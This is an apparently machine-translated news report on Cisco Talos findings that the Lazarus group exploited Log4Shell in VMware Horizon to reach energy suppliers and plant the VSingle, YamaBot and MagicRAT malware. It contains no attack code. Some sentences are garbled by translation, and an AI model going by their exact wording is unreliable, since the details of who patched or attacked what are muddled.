by Information security company Cisco Talos recently revealedThe Log4Shell vulnerability (CVE-2021-44228) in the Java logging framework Apache Log4j continues to be the starting point for hacking groups. From February to July this year, the North Korean hacker group Lazarus locked down VMware Horizon Energy suppliers in the U.S., Canada and Japan, which patched the vulnerability in the U.S., launched attacks to plant other malicious programs on those organizations’ systems.
Log4Shell announced in November 2021 is an arbitrary program execution vulnerability with a CVSS risk level of 10.There are about 20 Apache projectsAffected by the Log4Shell vulnerability, there are countless commercial services affected by the use of Log4j or related projects,Ernest & Young estimated that93% of cloud environments are at risk, and VMware’s virtual desktop and application management platformVMware Horizon is also one of the many victims。
Cisco Talos pointed out that Lazarus used the Log4Shell vulnerability in VMware products as an initial access to corporate networks, and then deployed malicious programs developed by the group to reside on victim networks in order to steal confidential information from these organizations. and intellectual property to conduct espionage or support the goals of the North Korean government. Since VMware Horizon is executed with administrative privileges, hackers do not have to worry about privilege issues at all, and after entering the victim network, the system’s anti-virus components are turned off.
Image credit/Cisco Talos
In this wave of attacks targeting energy suppliers in Canada, the United States, and Japan, the Lazarus Group used three customized malware, two of which are known VSingle and YamaBot, and the new MagicRAT.
VSingleIt was disclosed as early as March last year. It is an HTTP robot that can communicate with a remote C&C server to execute arbitrary programs remotely, or download and execute plug-ins;YamaBotIt is a malicious program written in Golang, originally targeting the Linux platform, but there are versions that support Windows. Both versions allow hackers to execute commands remotely. As for the newly discovered MagicRAT, it uses a different C&C server than VSingle and YamaBot. , the function is also used to maintain the hacker’s access to the system.
Another information security expert suggested that when deploying software vulnerabilities involving Log4Shell, it is best to make sure that the existing vulnerabilities have not been exploited by hackers, and then update the software, otherwise they may be penetrated by hackers without knowing it.
